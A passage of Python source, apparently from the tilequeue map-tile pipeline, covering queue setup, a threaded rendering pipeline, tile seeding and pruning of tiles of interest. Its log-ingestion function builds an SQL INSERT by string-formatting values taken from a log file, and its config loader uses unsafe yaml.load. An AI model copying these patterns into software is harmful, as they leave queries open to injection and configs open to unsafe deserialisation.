if isinstance(queue_yaml_cfg, list):
result = []
for queue_item_cfg in queue_yaml_cfg:
tile_queue, name = make_tile_queue(
queue_item_cfg, all_cfg, redis_client)
result.append((tile_queue, name))
return result
else:
queue_name = queue_yaml_cfg.get('name')
assert queue_name, 'Missing queue name'
queue_type = queue_yaml_cfg.get('type')
assert queue_type, 'Missing queue type'
if queue_type == 'sqs':
sqs_cfg = queue_yaml_cfg.get('sqs')
assert sqs_cfg, 'Missing queue sqs config'
visibility_yaml = all_cfg.get('message-visibility')
visibility_mgr = make_visibility_mgr_from_cfg(visibility_yaml)
tile_queue = make_sqs_queue_from_cfg(queue_name, sqs_cfg,
visibility_mgr)
elif queue_type == 'mem':
from tilequeue.queue import MemoryQueue
tile_queue = MemoryQueue()
elif queue_type == 'file':
from tilequeue.queue import OutputFileQueue
if os.path.exists(queue_name):
assert os.path.isfile(queue_name), \
('Could not create file queue. `./{}` is not a '
'file!'.format(queue_name))
fp = open(queue_name, 'a+')
tile_queue = OutputFileQueue(fp)
elif queue_type == 'stdout':
# only support writing
from tilequeue.queue import OutputFileQueue
tile_queue = OutputFileQueue(sys.stdout)
elif queue_type == 'redis':
assert redis_client, 'redis_client required for redis tile_queue'
from tilequeue.queue import make_redis_queue
tile_queue = make_redis_queue(redis_client, queue_name)
else:
raise ValueError('Unknown queue type: %s' % queue_type)
return tile_queue, queue_name
def make_msg_tracker(msg_tracker_yaml, logger):
if not msg_tracker_yaml:
from tilequeue.queue.message import SingleMessagePerCoordTracker
return SingleMessagePerCoordTracker()
else:
msg_tracker_type = msg_tracker_yaml.get('type')
assert msg_tracker_type, 'Missing message tracker type'
if msg_tracker_type == 'single':
from tilequeue.queue.message import SingleMessagePerCoordTracker
return SingleMessagePerCoordTracker()
elif msg_tracker_type == 'multiple':
from tilequeue.queue.message import MultipleMessagesPerCoordTracker
from tilequeue.log import MultipleMessagesTrackerLogger
msg_tracker_logger = MultipleMessagesTrackerLogger(logger)
return MultipleMessagesPerCoordTracker(msg_tracker_logger)
else:
assert 0, 'Unknown message tracker type: %s' % msg_tracker_type
def make_toi_helper(cfg):
if cfg.toi_store_type == 's3':
from tilequeue.toi import S3TilesOfInterestSet
return S3TilesOfInterestSet(
cfg.toi_store_s3_bucket,
cfg.toi_store_s3_key,
)
elif cfg.toi_store_type == 'file':
from tilequeue.toi import FileTilesOfInterestSet
return FileTilesOfInterestSet(
cfg.toi_store_file_name,
)
def make_redis_client(cfg):
from redis import StrictRedis
redis_client = StrictRedis(cfg.redis_host, cfg.redis_port, cfg.redis_db)
return redis_client
def make_logger(cfg, logger_name, loglevel=logging.INFO):
if getattr(cfg, 'logconfig') is not None:
logging.config.fileConfig(cfg.logconfig)
logger = logging.getLogger(logger_name)
logger.setLevel(loglevel)
return logger
def make_seed_tile_generator(cfg):
if cfg.seed_all_zoom_start is not None:
assert cfg.seed_all_zoom_until is not None
all_tiles = seed_tiles(cfg.seed_all_zoom_start,
cfg.seed_all_zoom_until)
else:
all_tiles = ()
if cfg.seed_metro_extract_url:
assert cfg.seed_metro_extract_zoom_start is not None
assert cfg.seed_metro_extract_zoom_until is not None
with closing(urlopen(cfg.seed_metro_extract_url)) as fp:
# will raise a MetroExtractParseError on failure
metro_extracts = parse_metro_extract(fp)
city_filter = cfg.seed_metro_extract_cities
if city_filter is not None:
metro_extracts = [
city for city in metro_extracts if city.city in city_filter]
multiple_bounds = city_bounds(metro_extracts)
metro_extract_tiles = tile_generator_for_multiple_bounds(
multiple_bounds, cfg.seed_metro_extract_zoom_start,
cfg.seed_metro_extract_zoom_until)
else:
metro_extract_tiles = ()
if cfg.seed_top_tiles_url:
assert cfg.seed_top_tiles_zoom_start is not None
assert cfg.seed_top_tiles_zoom_until is not None
with closing(urlopen(cfg.seed_top_tiles_url)) as fp:
top_tiles = parse_top_tiles(
fp, cfg.seed_top_tiles_zoom_start,
cfg.seed_top_tiles_zoom_until)
else:
top_tiles = ()
if cfg.seed_custom_bboxes:
assert cfg.seed_custom_zoom_start is not None
assert cfg.seed_custom_zoom_until is not None
custom_tiles = tile_generator_for_multiple_bounds(
cfg.seed_custom_bboxes, cfg.seed_custom_zoom_start,
cfg.seed_custom_zoom_until)
else:
custom_tiles = ()
combined_tiles = chain(
all_tiles, metro_extract_tiles, top_tiles, custom_tiles)
if cfg.seed_unique:
tile_generator = uniquify_generator(combined_tiles)
else:
tile_generator = combined_tiles
return tile_generator
def _make_store(cfg,
s3_role_arn=None,
s3_role_session_duration_s=None,
logger=None):
store_cfg = cfg.yml.get('store')
assert store_cfg, "Store was not configured, but is necessary."
if logger is None:
logger = make_logger(cfg, 'process')
store = make_store(store_cfg,
s3_role_arn=s3_role_arn,
s3_role_session_duration_s=s3_role_session_duration_s,
logger=logger)
return store
def explode_and_intersect(coord_ints, tiles_of_interest, until=0):
next_coord_ints = coord_ints
coord_ints_at_parent_zoom = set()
total_coord_ints = []
# to capture metrics
total = 0
hits = 0
misses = 0
while True:
for coord_int in next_coord_ints:
total += 1
if coord_int in tiles_of_interest:
hits += 1
total_coord_ints.append(coord_int)
else:
misses += 1
zoom = zoom_mask & coord_int
if zoom > until:
parent_coord_int = coord_int_zoom_up(coord_int)
coord_ints_at_parent_zoom.add(parent_coord_int)
if not coord_ints_at_parent_zoom:
break
next_coord_ints = coord_ints_at_parent_zoom
coord_ints_at_parent_zoom = set()
metrics = dict(
total=total,
hits=hits,
misses=misses,
n_toi=len(tiles_of_interest),
)
return total_coord_ints, metrics
def coord_ints_from_paths(paths):
coord_set = set()
path_counts = []
for path in paths:
path_count = 0
with open(path) as fp:
coords = create_coords_generator_from_tiles_file(fp)
for coord in coords:
coord_int = coord_marshall_int(coord)
coord_set.add(coord_int)
path_count += 1
path_counts.append((path, path_count))
result = dict(
coord_set=coord_set,
path_counts=path_counts,
)
return result
def _parse_postprocess_resources(post_process_item, cfg_path):
resources_cfg = post_process_item.get('resources', {})
resources = {}
for resource_name, resource_cfg in resources_cfg.iteritems():
resource_type = resource_cfg.get('type')
init_fn_name = resource_cfg.get('init_fn')
assert resource_type, 'Missing type in resource %r' \
% resource_name
assert init_fn_name, 'Missing init function name in ' \
'resource %r' % resource_name
try:
fn = resolve(init_fn_name)
except Exception:
raise Exception('Unable to init resource %r with function %r due '
'to %s' % (resource_name, init_fn_name,
"".join(traceback.format_exception(
*sys.exc_info()))))
if resource_type == 'file':
path = resource_cfg.get('path')
assert path, 'Resource %r of type file is missing the ' \
'path parameter' % resource_name
with open(os.path.join(cfg_path, path), 'r') as fh:
resources[resource_name] = fn(fh)
else:
raise Exception('Resource type %r is not supported'
% resource_type)
return resources
SourcesConfig = namedtuple('SourcesConfig', 'sources queries_generator')
def parse_layer_data(query_cfg, buffer_cfg, cfg_path):
all_layer_names = query_cfg['all']
layers_config = query_cfg['layers']
post_process_config = query_cfg.get('post_process', [])
layer_data = []
all_layer_data = []
post_process_data = []
for layer_name, layer_config in layers_config.items():
area_threshold = int(layer_config.get('area-inclusion-threshold', 1))
layer_datum = dict(
name=layer_name,
is_clipped=layer_config.get('clip', True),
clip_factor=layer_config.get('clip_factor', 1.0),
geometry_types=layer_config['geometry_types'],
transform_fn_names=layer_config.get('transform', []),
sort_fn_name=layer_config.get('sort'),
simplify_before_intersect=layer_config.get(
'simplify_before_intersect', False),
simplify_start=layer_config.get('simplify_start', 0),
area_threshold=area_threshold,
query_bounds_pad_fn=create_query_bounds_pad_fn(
buffer_cfg, layer_name),
tolerance=float(layer_config.get('tolerance', 1.0)),
)
layer_data.append(layer_datum)
if layer_name in all_layer_names:
all_layer_data.append(layer_datum)
for post_process_item in post_process_config:
fn_name = post_process_item.get('fn')
assert fn_name, 'Missing post process config fn'
params = post_process_item.get('params')
if params is None:
params = {}
resources = _parse_postprocess_resources(post_process_item, cfg_path)
post_process_data.append(dict(
fn_name=fn_name,
params=dict(params),
resources=resources))
return all_layer_data, layer_data, post_process_data
def make_output_calc_mapping(process_yaml_cfg):
output_calc_mapping = {}
if process_yaml_cfg['type'] == 'parse':
parse_cfg = process_yaml_cfg['parse']
yaml_path = parse_cfg['path']
assert os.path.isdir(yaml_path), 'Invalid yaml path: %s' % yaml_path
from vectordatasource.meta.python import make_function_name_props
from vectordatasource.meta.python import output_kind
from vectordatasource.meta.python import parse_layers
layer_parse_result = parse_layers(
yaml_path, output_kind, make_function_name_props)
for layer_datum in layer_parse_result.layer_data:
output_calc_mapping[layer_datum.layer] = layer_datum.fn
elif process_yaml_cfg['type'] == 'callable':
callable_cfg = process_yaml_cfg['callable']
dotted_name = callable_cfg['dotted-name']
fn = resolve(dotted_name)
output_calc_mapping = fn(*callable_cfg['args'])
else:
raise ValueError('Invalid process yaml config: %s' % process_yaml_cfg)
return output_calc_mapping
def make_min_zoom_calc_mapping(process_yaml_cfg):
# can't handle "callable" type - how do we get the min zoom fn?
assert process_yaml_cfg['type'] == 'parse'
min_zoom_calc_mapping = {}
parse_cfg = process_yaml_cfg['parse']
yaml_path = parse_cfg['path']
assert os.path.isdir(yaml_path), 'Invalid yaml path: %s' % yaml_path
from vectordatasource.meta.python import make_function_name_min_zoom
from vectordatasource.meta.python import output_min_zoom
from vectordatasource.meta.python import parse_layers
layer_parse_result = parse_layers(
yaml_path, output_min_zoom, make_function_name_min_zoom)
for layer_datum in layer_parse_result.layer_data:
min_zoom_calc_mapping[layer_datum.layer] = layer_datum.fn
return min_zoom_calc_mapping
def tilequeue_process(cfg, peripherals):
from tilequeue.log import JsonTileProcessingLogger
logger = make_logger(cfg, 'process')
tile_proc_logger = JsonTileProcessingLogger(logger)
tile_proc_logger.lifecycle('tilequeue processing started')
assert os.path.exists(cfg.query_cfg), \
'Invalid query config path'
with open(cfg.query_cfg) as query_cfg_fp:
query_cfg = yaml.load(query_cfg_fp)
all_layer_data, layer_data, post_process_data = (
parse_layer_data(
query_cfg, cfg.buffer_cfg, os.path.dirname(cfg.query_cfg)))
formats = lookup_formats(cfg.output_formats)
store = _make_store(cfg)
assert cfg.postgresql_conn_info, 'Missing postgresql connection info'
from shapely import speedups
if speedups.available:
speedups.enable()
tile_proc_logger.lifecycle('Shapely speedups enabled')
else:
tile_proc_logger.lifecycle(
'Shapely speedups not enabled, they were not available')
output_calc_mapping = make_output_calc_mapping(cfg.process_yaml_cfg)
n_cpu = multiprocessing.cpu_count()
n_simultaneous_query_sets = cfg.n_simultaneous_query_sets
if not n_simultaneous_query_sets:
# default to number of databases configured
n_simultaneous_query_sets = len(cfg.postgresql_conn_info['dbnames'])
assert n_simultaneous_query_sets > 0
# reduce queue size when we're rendering metatiles to try and avoid the
# geometry waiting to be processed from taking up all the RAM!
size_sqr = (cfg.metatile_size or 1)**2
default_queue_buffer_size = max(1, 16 / size_sqr)
sql_queue_buffer_size = cfg.sql_queue_buffer_size or \
default_queue_buffer_size
proc_queue_buffer_size = cfg.proc_queue_buffer_size or \
default_queue_buffer_size
s3_queue_buffer_size = cfg.s3_queue_buffer_size or \
default_queue_buffer_size
n_layers = len(all_layer_data)
n_formats = len(formats)
n_simultaneous_s3_storage = cfg.n_simultaneous_s3_storage
if not n_simultaneous_s3_storage:
n_simultaneous_s3_storage = max(n_cpu / 2, 1)
assert n_simultaneous_s3_storage > 0
# thread pool used for queries and uploading to s3
n_total_needed_query = n_layers * n_simultaneous_query_sets
n_total_needed_s3 = n_formats * n_simultaneous_s3_storage
n_total_needed = n_total_needed_query + n_total_needed_s3
n_max_io_workers = 50
n_io_workers = min(n_total_needed, n_max_io_workers)
io_pool = ThreadPool(n_io_workers)
feature_fetcher = make_data_fetcher(cfg, layer_data, query_cfg, io_pool)
# create all queues used to manage pipeline
# holds coordinate messages from tile queue reader
# TODO can move this hardcoded value to configuration
# having a little less than the value is beneficial
# ie prefer to read on-demand from queue rather than hold messages
# in waiting while others are processed, can become stale faster
tile_input_queue = Queue.Queue(10)
# holds raw sql results - no filtering or processing done on them
sql_data_fetch_queue = multiprocessing.Queue(sql_queue_buffer_size)
# holds data after it has been filtered and processed
# this is where the cpu intensive part of the operation will happen
# the results will be data that is formatted for each necessary format
processor_queue = multiprocessing.Queue(proc_queue_buffer_size)
# holds data after it has been sent to s3
s3_store_queue = Queue.Queue(s3_queue_buffer_size)
# create worker threads/processes
thread_tile_queue_reader_stop = threading.Event()
queue_mapper = peripherals.queue_mapper
msg_marshaller = peripherals.msg_marshaller
msg_tracker_yaml = cfg.yml.get('message-tracker')
msg_tracker = make_msg_tracker(msg_tracker_yaml, logger)
from tilequeue.stats import TileProcessingStatsHandler
stats_handler = TileProcessingStatsHandler(peripherals.stats)
tile_queue_reader = TileQueueReader(
queue_mapper, msg_marshaller, msg_tracker, tile_input_queue,
tile_proc_logger, stats_handler, thread_tile_queue_reader_stop,
cfg.max_zoom, cfg.group_by_zoom)
data_fetch = DataFetch(
feature_fetcher, tile_input_queue, sql_data_fetch_queue, io_pool,
tile_proc_logger, stats_handler, cfg.metatile_zoom, cfg.max_zoom,
cfg.metatile_start_zoom)
data_processor = ProcessAndFormatData(
post_process_data, formats, sql_data_fetch_queue, processor_queue,
cfg.buffer_cfg, output_calc_mapping, layer_data, tile_proc_logger,
stats_handler)
s3_storage = S3Storage(processor_queue, s3_store_queue, io_pool, store,
tile_proc_logger, cfg.metatile_size)
thread_tile_writer_stop = threading.Event()
tile_queue_writer = TileQueueWriter(
queue_mapper, s3_store_queue, peripherals.inflight_mgr,
msg_tracker, tile_proc_logger, stats_handler,
thread_tile_writer_stop)
def create_and_start_thread(fn, *args):
t = threading.Thread(target=fn, args=args)
t.start()
return t
thread_tile_queue_reader = create_and_start_thread(tile_queue_reader)
threads_data_fetch = []
threads_data_fetch_stop = []
for i in range(n_simultaneous_query_sets):
thread_data_fetch_stop = threading.Event()
thread_data_fetch = create_and_start_thread(data_fetch,
thread_data_fetch_stop)
threads_data_fetch.append(thread_data_fetch)
threads_data_fetch_stop.append(thread_data_fetch_stop)
# create a data processor per cpu
n_data_processors = n_cpu
data_processors = []
data_processors_stop = []
for i in range(n_data_processors):
data_processor_stop = multiprocessing.Event()
process_data_processor = multiprocessing.Process(
target=data_processor, args=(data_processor_stop,))
process_data_processor.start()
data_processors.append(process_data_processor)
data_processors_stop.append(data_processor_stop)
threads_s3_storage = []
threads_s3_storage_stop = []
for i in range(n_simultaneous_s3_storage):
thread_s3_storage_stop = threading.Event()
thread_s3_storage = create_and_start_thread(s3_storage,
thread_s3_storage_stop)
threads_s3_storage.append(thread_s3_storage)
threads_s3_storage_stop.append(thread_s3_storage_stop)
thread_tile_writer = create_and_start_thread(tile_queue_writer)
if cfg.log_queue_sizes:
assert(cfg.log_queue_sizes_interval_seconds > 0)
queue_data = (
(tile_input_queue, 'queue'),
(sql_data_fetch_queue, 'sql'),
(processor_queue, 'proc'),
(s3_store_queue, 's3'),
)
queue_printer_thread_stop = threading.Event()
queue_printer = QueuePrint(
cfg.log_queue_sizes_interval_seconds, queue_data, tile_proc_logger,
queue_printer_thread_stop)
queue_printer_thread = create_and_start_thread(queue_printer)
else:
queue_printer_thread = None
queue_printer_thread_stop = None
def stop_all_workers(signum, stack):
tile_proc_logger.lifecycle('tilequeue processing shutdown ...')
tile_proc_logger.lifecycle(
'requesting all workers (threads and processes) stop ...')
# each worker guards its read loop with an event object
# ask all these to stop first
thread_tile_queue_reader_stop.set()
for thread_data_fetch_stop in threads_data_fetch_stop:
thread_data_fetch_stop.set()
for data_processor_stop in data_processors_stop:
data_processor_stop.set()
for thread_s3_storage_stop in threads_s3_storage_stop:
thread_s3_storage_stop.set()
thread_tile_writer_stop.set()
if queue_printer_thread_stop:
queue_printer_thread_stop.set()
tile_proc_logger.lifecycle(
'requesting all workers (threads and processes) stop ... done')
# Once workers receive a stop event, they will keep reading
# from their queues until they receive a sentinel value. This
# is mandatory so that no messages will remain on queues when
# asked to join. Otherwise, we never terminate.
tile_proc_logger.lifecycle('joining all workers ...')
tile_proc_logger.lifecycle('joining tile queue reader ...')
thread_tile_queue_reader.join()
tile_proc_logger.lifecycle('joining tile queue reader ... done')
tile_proc_logger.lifecycle(
'enqueueing sentinels for data fetchers ...')
for i in range(len(threads_data_fetch)):
tile_input_queue.put(None)
tile_proc_logger.lifecycle(
'enqueueing sentinels for data fetchers ... done')
tile_proc_logger.lifecycle('joining data fetchers ...')
for thread_data_fetch in threads_data_fetch:
thread_data_fetch.join()
tile_proc_logger.lifecycle('joining data fetchers ... done')
tile_proc_logger.lifecycle(
'enqueueing sentinels for data processors ...')
for i in range(len(data_processors)):
sql_data_fetch_queue.put(None)
tile_proc_logger.lifecycle(
'enqueueing sentinels for data processors ... done')
tile_proc_logger.lifecycle('joining data processors ...')
for data_processor in data_processors:
data_processor.join()
tile_proc_logger.lifecycle('joining data processors ... done')
tile_proc_logger.lifecycle('enqueueing sentinels for s3 storage ...')
for i in range(len(threads_s3_storage)):
processor_queue.put(None)
tile_proc_logger.lifecycle(
'enqueueing sentinels for s3 storage ... done')
tile_proc_logger.lifecycle('joining s3 storage ...')
for thread_s3_storage in threads_s3_storage:
thread_s3_storage.join()
tile_proc_logger.lifecycle('joining s3 storage ... done')
tile_proc_logger.lifecycle(
'enqueueing sentinel for tile queue writer ...')
s3_store_queue.put(None)
tile_proc_logger.lifecycle(
'enqueueing sentinel for tile queue writer ... done')
tile_proc_logger.lifecycle('joining tile queue writer ...')
thread_tile_writer.join()
tile_proc_logger.lifecycle('joining tile queue writer ... done')
if queue_printer_thread:
tile_proc_logger.lifecycle('joining queue printer ...')
queue_printer_thread.join()
tile_proc_logger.lifecycle('joining queue printer ... done')
tile_proc_logger.lifecycle('joining all workers ... done')
tile_proc_logger.lifecycle('joining io pool ...')
io_pool.close()
io_pool.join()
tile_proc_logger.lifecycle('joining io pool ... done')
tile_proc_logger.lifecycle('joining multiprocess data fetch queue ...')
sql_data_fetch_queue.close()
sql_data_fetch_queue.join_thread()
tile_proc_logger.lifecycle(
'joining multiprocess data fetch queue ... done')
tile_proc_logger.lifecycle('joining multiprocess process queue ...')
processor_queue.close()
processor_queue.join_thread()
tile_proc_logger.lifecycle(
'joining multiprocess process queue ... done')
tile_proc_logger.lifecycle('tilequeue processing shutdown ... done')
sys.exit(0)
signal.signal(signal.SIGTERM, stop_all_workers)
signal.signal(signal.SIGINT, stop_all_workers)
signal.signal(signal.SIGQUIT, stop_all_workers)
tile_proc_logger.lifecycle('all tilequeue threads and processes started')
# this is necessary for the main thread to receive signals
# when joining on threads/processes, the signal is never received
# http://www.luke.maurits.id.au/blog/post/threads-and-signals-in-python.html
while True:
time.sleep(1024)
def coords_generator_from_queue(queue):
"""given a python queue, read from it and yield coordinates"""
while True:
coord = queue.get()
if coord is None:
break
yield coord
def tilequeue_seed(cfg, peripherals):
logger = make_logger(cfg, 'seed')
logger.info('Seeding tiles ...')
queue_writer = peripherals.queue_writer
# based on cfg, create tile generator
tile_generator = make_seed_tile_generator(cfg)
queue_buf_size = 1024
tile_queue_queue = Queue.Queue(queue_buf_size)
# updating tile queue happens in background threads
def tile_queue_enqueue():
coords = coords_generator_from_queue(tile_queue_queue)
queue_writer.enqueue_batch(coords)
logger.info('Enqueueing ... ')
thread_enqueue = threading.Thread(target=tile_queue_enqueue)
thread_enqueue.start()
n_coords = 0
for coord in tile_generator:
tile_queue_queue.put(coord)
n_coords += 1
if n_coords % 100000 == 0:
logger.info('%d enqueued' % n_coords)
tile_queue_queue.put(None)
thread_enqueue.join()
logger.info('Enqueueing ... done')
if cfg.seed_should_add_to_tiles_of_interest:
logger.info('Adding to Tiles of Interest ... ')
if (cfg.toi_store_type == 'file' and
not os.path.exists(cfg.toi_store_file_name)):
toi_set = set()
else:
toi_set = peripherals.toi.fetch_tiles_of_interest()
tile_generator = make_seed_tile_generator(cfg)
for coord in tile_generator:
coord_int = coord_marshall_int(coord)
toi_set.add(coord_int)
peripherals.toi.set_tiles_of_interest(toi_set)
emit_toi_stats(toi_set, peripherals)
logger.info('Adding to Tiles of Interest ... done')
logger.info('Seeding tiles ... done')
logger.info('%d coordinates enqueued' % n_coords)
def tilequeue_enqueue_tiles_of_interest(cfg, peripherals):
logger = make_logger(cfg, 'enqueue_tiles_of_interest')
logger.info('Enqueueing tiles of interest')
logger.info('Fetching tiles of interest ...')
tiles_of_interest = peripherals.toi.fetch_tiles_of_interest()
n_toi = len(tiles_of_interest)
logger.info('Fetching tiles of interest ... done')
coords = []
for coord_int in tiles_of_interest:
coord = coord_unmarshall_int(coord_int)
if coord.zoom <= cfg.max_zoom:
coords.append(coord)
queue_writer = peripherals.queue_writer
n_queued, n_in_flight = queue_writer.enqueue_batch(coords)
logger.info('%d enqueued - %d in flight' % (n_queued, n_in_flight))
logger.info('%d tiles of interest processed' % n_toi)
def tilequeue_enqueue_stdin(cfg, peripherals):
logger = make_logger(cfg, 'enqueue_stdin')
def _stdin_coord_generator():
for line in sys.stdin:
line = line.strip()
coord = deserialize_coord(line)
if coord is not None:
yield coord
queue_writer = peripherals.queue_writer
coords = _stdin_coord_generator()
n_queued, n_in_flight = queue_writer.enqueue_batch(coords)
logger.info('%d enqueued - %d in flight' % (n_queued, n_in_flight))
def coord_pyramid(coord, zoom_start, zoom_stop):
"""
generate full pyramid for coord
Generate the full pyramid for a single coordinate. Note that zoom_stop is
exclusive.
"""
if zoom_start <= coord.zoom:
yield coord
for child_coord in coord_children_range(coord, zoom_stop):
if zoom_start <= child_coord.zoom:
yield child_coord
def coord_pyramids(coords, zoom_start, zoom_stop):
"""
generate full pyramid for coords
Generate the full pyramid for the list of coords. Note that zoom_stop is
exclusive.
"""
for coord in coords:
for child in coord_pyramid(coord, zoom_start, zoom_stop):
yield child
def tilequeue_enqueue_full_pyramid_from_toi(cfg, peripherals, args):
"""enqueue a full pyramid from the z10 toi"""
logger = make_logger(cfg, 'enqueue_tiles_of_interest')
logger.info('Enqueueing tiles of interest')
logger.info('Fetching tiles of interest ...')
tiles_of_interest = peripherals.toi.fetch_tiles_of_interest()
n_toi = len(tiles_of_interest)
logger.info('Fetching tiles of interest ... done')
rawr_yaml = cfg.yml.get('rawr')
assert rawr_yaml, 'Missing rawr yaml'
group_by_zoom = rawr_yaml.get('group-zoom')
assert group_by_zoom, 'Missing rawr group-zoom'
assert isinstance(group_by_zoom, int), 'Invalid rawr group-zoom'
if args.zoom_start is None:
zoom_start = group_by_zoom
else:
zoom_start = args.zoom_start
if args.zoom_stop is None:
zoom_stop = cfg.max_zoom + 1 # +1 because exclusive
else:
zoom_stop = args.zoom_stop
assert zoom_start >= group_by_zoom
assert zoom_stop > zoom_start
ungrouped = []
coords_at_group_zoom = set()
for coord_int in tiles_of_interest:
coord = coord_unmarshall_int(coord_int)
if coord.zoom < zoom_start:
ungrouped.append(coord)
if coord.zoom >= group_by_zoom:
coord_at_group_zoom = coord.zoomTo(group_by_zoom).container()
coords_at_group_zoom.add(coord_at_group_zoom)
pyramids = coord_pyramids(coords_at_group_zoom, zoom_start, zoom_stop)
coords_to_enqueue = chain(ungrouped, pyramids)
queue_writer = peripherals.queue_writer
n_queued, n_in_flight = queue_writer.enqueue_batch(coords_to_enqueue)
logger.info('%d enqueued - %d in flight' % (n_queued, n_in_flight))
logger.info('%d tiles of interest processed' % n_toi)
def tilequeue_enqueue_random_pyramids(cfg, peripherals, args):
"""enqueue random pyramids"""
from tilequeue.stats import RawrTileEnqueueStatsHandler
from tilequeue.rawr import make_rawr_enqueuer_from_cfg
logger = make_logger(cfg, 'enqueue_random_pyramids')
rawr_yaml = cfg.yml.get('rawr')
assert rawr_yaml, 'Missing rawr yaml'
group_by_zoom = rawr_yaml.get('group-zoom')
assert group_by_zoom, 'Missing rawr group-zoom'
assert isinstance(group_by_zoom, int), 'Invalid rawr group-zoom'
if args.zoom_start is None:
zoom_start = group_by_zoom
else:
zoom_start = args.zoom_start
if args.zoom_stop is None:
zoom_stop = cfg.max_zoom + 1 # +1 because exclusive
else:
zoom_stop = args.zoom_stop
assert zoom_start >= group_by_zoom
assert zoom_stop > zoom_start
gridsize = args.gridsize
total_samples = getattr(args, 'n-samples')
samples_per_cell = total_samples / (gridsize * gridsize)
tileset_dim = 2 ** group_by_zoom
scale_factor = float(tileset_dim) / float(gridsize)
stats = make_statsd_client_from_cfg(cfg)
stats_handler = RawrTileEnqueueStatsHandler(stats)
rawr_enqueuer = make_rawr_enqueuer_from_cfg(
cfg, logger, stats_handler, peripherals.msg_marshaller)
for grid_y in xrange(gridsize):
tile_y_min = int(grid_y * scale_factor)
tile_y_max = int((grid_y+1) * scale_factor)
for grid_x in xrange(gridsize):
tile_x_min = int(grid_x * scale_factor)
tile_x_max = int((grid_x+1) * scale_factor)
cell_samples = set()
for i in xrange(samples_per_cell):
while True:
rand_x = randrange(tile_x_min, tile_x_max)
rand_y = randrange(tile_y_min, tile_y_max)
sample = rand_x, rand_y
if sample in cell_samples:
continue
cell_samples.add(sample)
break
# enqueue a cell at a time
# the queue mapper expects to be able to read the entirety of the
# input into memory first
for x, y in cell_samples:
coord = Coordinate(zoom=group_by_zoom, column=x, row=y)
pyramid = coord_pyramid(coord, zoom_start, zoom_stop)
rawr_enqueuer(pyramid)
def tilequeue_consume_tile_traffic(cfg, peripherals):
logger = make_logger(cfg, 'consume_tile_traffic')
logger.info('Consuming tile traffic logs ...')
tile_log_records = None
with open(cfg.tile_traffic_log_path, 'r') as log_file:
tile_log_records = parse_log_file(log_file)
if not tile_log_records:
logger.info("Couldn't parse log file")
sys.exit(1)
conn_info = dict(cfg.postgresql_conn_info)
dbnames = conn_info.pop('dbnames')
sql_conn_pool = DBConnectionPool(dbnames, conn_info, False)
sql_conn = sql_conn_pool.get_conns(1)[0]
with sql_conn.cursor() as cursor:
# insert the log records after the latest_date
cursor.execute('SELECT max(date) from tile_traffic_v4')
max_timestamp = cursor.fetchone()[0]
n_coords_inserted = 0
for host, timestamp, coord_int in tile_log_records:
if not max_timestamp or timestamp > max_timestamp:
coord = coord_unmarshall_int(coord_int)
cursor.execute(
"INSERT into tile_traffic_v4 "
"(date, z, x, y, tilesize, service, host) VALUES "
"('%s', %d, %d, %d, %d, '%s', '%s')"
% (timestamp, coord.zoom, coord.column, coord.row, 512,
'vector-tiles', host))
n_coords_inserted += 1
logger.info('Inserted %d records' % n_coords_inserted)
sql_conn_pool.put_conns([sql_conn])
def emit_toi_stats(toi_set, peripherals):
"""
Calculates new TOI stats and emits them via statsd.
"""
count_by_zoom = defaultdict(int)
total = 0
for coord_int in toi_set:
coord = coord_unmarshall_int(coord_int)
count_by_zoom[coord.zoom] += 1
total += 1
peripherals.stats.gauge('tiles-of-interest.count', total)
for zoom, count in count_by_zoom.items():
peripherals.stats.gauge(
'tiles-of-interest.by-zoom.z{:02d}'.format(zoom),
count
)
def tilequeue_prune_tiles_of_interest(cfg, peripherals):
logger = make_logger(cfg, 'prune_tiles_of_interest')
logger.info('Pruning tiles of interest ...')
time_overall = peripherals.stats.timer('gardener.overall')
time_overall.start()
logger.info('Fetching tiles recently requested ...')
import psycopg2
prune_cfg = cfg.yml.get('toi-prune', {})
tile_history_cfg = prune_cfg.get('tile-history', {})
db_conn_info = tile_history_cfg.get('database-uri')
assert db_conn_info, ("A postgres-compatible connection URI must "
"be present in the config yaml")
redshift_days_to_query = tile_history_cfg.get('days')
assert redshift_days_to_query, ("Number of days to query "
"redshift is not specified")
redshift_zoom_cutoff = int(tile_history_cfg.get('max-zoom', '16'))
# flag indicating that s3 entry in toi-prune is used for s3 store
legacy_fallback = 's3' in prune_cfg
store_parts = prune_cfg.get('s3') or prune_cfg.get('store')
assert store_parts, (
'The configuration of a store containing tiles to delete must be '
'specified under toi-prune:store or toi-prune:s3')
# explictly override the store configuration with values provided
# in toi-prune:s3
if legacy_fallback:
cfg.store_type = 's3'
cfg.s3_bucket = store_parts['bucket']
cfg.s3_date_prefix = store_parts['date-prefix']
cfg.s3_path = store_parts['path']
redshift_results = defaultdict(int)
with psycopg2.connect(db_conn_info) as conn:
with conn.cursor() as cur:
cur.execute("""
select x, y, z, tilesize, count(*)
from tile_traffic_v4
where (date >= (current_timestamp - interval '{days} days'))
and (z between 0 and {max_zoom})
and (x between 0 and pow(2,z)-1)
and (y between 0 and pow(2,z)-1)
and (service = 'vector-tiles')
group by z, x, y, tilesize
order by z, x, y, tilesize
""".format(
days=redshift_days_to_query,
max_zoom=redshift_zoom_cutoff
))
for (x, y, z, tile_size, count) in cur:
coord = create_coord(x, y, z)
try:
tile_size_as_zoom = metatile_zoom_from_str(tile_size)
# tile size as zoom > cfg.metatile_zoom would mean that
# someone requested a tile larger than the system is
# currently configured to support (might have been a
# previous configuration).
assert tile_size_as_zoom <= cfg.metatile_zoom
tile_zoom_offset = tile_size_as_zoom - cfg.metatile_zoom
except AssertionError:
# we don't want bogus data to kill the whole process, but
# it's helpful to have a warning. we'll just skip the bad
# row and continue.
logger.warning('Tile size %r is bogus. Should be None, '
'256, 512 or 1024' % (tile_size,))
continue
if tile_zoom_offset:
# if the tile is not the same size as the metatile, then we
# need to offset the zoom to make sure we enqueue the job
# which results in this coordinate being rendered.
coord = coord.zoomBy(tile_zoom_offset).container()
# just in case we fell off the end of the zoom scale.
if coord.zoom < 0:
continue
# Sum the counts from the 256 and 512 tile requests into the
# slot for the 512 tile.
coord_int = coord_marshall_int(coord)
redshift_results[coord_int] += count
logger.info('Fetching tiles recently requested ... done. %s found',
len(redshift_results))
cutoff_cfg = prune_cfg.get('cutoff', {})
cutoff_requests = cutoff_cfg.get('min-requests', 0)
cutoff_tiles = cutoff_cfg.get('max-tiles', 0)
logger.info('Finding %s tiles requested %s+ times ...',
cutoff_tiles,
cutoff_requests,
)
new_toi = set()
for coord_int, count in sorted(
redshift_results.iteritems(),
key=operator.itemgetter(1),
